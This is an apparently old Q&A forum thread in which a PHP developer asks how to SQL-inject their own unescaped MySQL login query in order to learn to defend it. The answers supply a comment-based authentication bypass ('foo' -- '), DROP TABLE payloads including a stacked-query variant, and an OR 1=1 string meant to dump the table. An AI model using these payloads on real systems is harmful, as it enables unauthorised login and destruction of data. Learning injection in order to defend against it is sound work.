tags:

views:

303

answers:

5
+2  Q: 

How to MySQL Injection this!

Hello everyone, and thanks for looking at my question.

I like to note first that this is an education attempt on my own database to better understand mysql injections to protect my own code.

I need to work out a couple of examples of how a mysql injection can be constructed against the following code. It's a basic user login system where I'm accepting the username and password without any escaping 

$user = (!empty($_POST['user'])) ? $_POST['user'] : '';
$pass = (!empty($_POST['pass'])) ? $_POST['pass'] : '';

The mysql query then tries to find the entered username and password in my table called users, as follows: 

$res = mysql_query("SELECT * from users where user='{$user}' AND pass='{$pass}'");

This is un-escaped input, and I'm trying to come up with mysql injections to 1) bypass the password knowing a legitimate user's username (one user in my users table is tester) and 2) an injection that would drop the users table in its entirety.

I've tried a couple of mysql injection examples from wikipedia, but I'm guessing the {} in my query is preventing the injection, so I would appreciate some help from those who are confident with this, and thank you to all..

A: 

Here's a long list.

http://ha.ckers.org/sqlinjection/

Your code will obviously fail almost all the test as it is totally unprotected.

rikh  2009-10-02 09:10:53
thanks for the resource, pretty helpful
Chris  2009-10-04 10:40:05
A: 

{} are not the reason. It might be that php's Magic Quotes (now deprecated) protect you from rather simplistic attacks.

However, you can switch them off and then test again.

middus  2009-10-02 09:11:37
+2  A: 

Something like this should do:

  1. To log in as user "foo", set the username to "foo' -- "

This will make your query look like

$res = mysql_query("SELECT * from users where user='foo' -- ' AND pass=''");

The "-- " means the rest of the line is commented out

  1. Not sure if this will work but try setting the username to "foo' OR (DROP TABLE users) -- "

This will make your query look like:

$res = mysql_query("SELECT * from users where user='foo' OR (DROP TABLE users) -- ' AND pass=''");

might not accept that though - I think subqueries can only SELECT.

The mysql_query function will only run one query - others would let you do this:

$res = mysql_query("SELECT * from users where user='foo'; DROP TABLE users -- ' AND pass=''");
Greg  2009-10-02 09:12:34
Multiple queries using mysql_query is unsupported as stated in the doc : mysql_query() sends a unique query (multiple queries are not supported) to the currently active database on the server that's associated with the specified link_identifier .
Julien Tartarin  2009-10-02 09:17:35
+1  A: 

You will not be able to DROP the table because using mysql_query you can't send multiple queries.

Julien Tartarin  2009-10-02 09:16:31
A: 

Try this one out and see if it dumps the entire table:

For both username and password, I enter:

' OR 1=1 AND '}' '=

This of course assumes that I know you are using the curly brace to wrap the data values.

I'm really not sure how MySQL handles mixed logic like that, since it's not enclosed in parenthesis, so let me know if it works!

Anthony  2009-10-02 09:21:39

related questions

Remove Quotes and Commas from a String in MySQL
What's the best way of converting a mysql database to a sqlite one?
How do you manage databases in development, test, and production?
Multiple foreign keys?
Add 1 to a field (MySQL)
Issues using MS Access as a front-end to a MySQL database back-end?
Bigger than a char but smaller than a blob
How do I retrieve my MySQL username and password?
Long-time LAMP Developer moving to VB.NET
How do I Concatenate entire result sets in MySQL?
Full complete MySQL database replication? Ideas? What do people do?
SQL: Distribution of table in time
SQLite vs MySQL
How do I create a new Ruby on Rails application using MySQL instead of SQLite?
Multiple Updates in MySQL
MySQL/Apache Error in PHP MySQL query
What all do I need to escape when sending a (My)SQL query?
Auto Generate Database Diagram MySQL
Mechanisms for tracking DB schema changes
How big can a MySQL database get before performance starts to degrade.
Python and MySQL
SQL Server 2005 implementation of MySQL REPLACE INTO?
How to export data from SQL Server 2005 to MySQL
Throw Error In MySQL Trigger
Binary Data in MySQL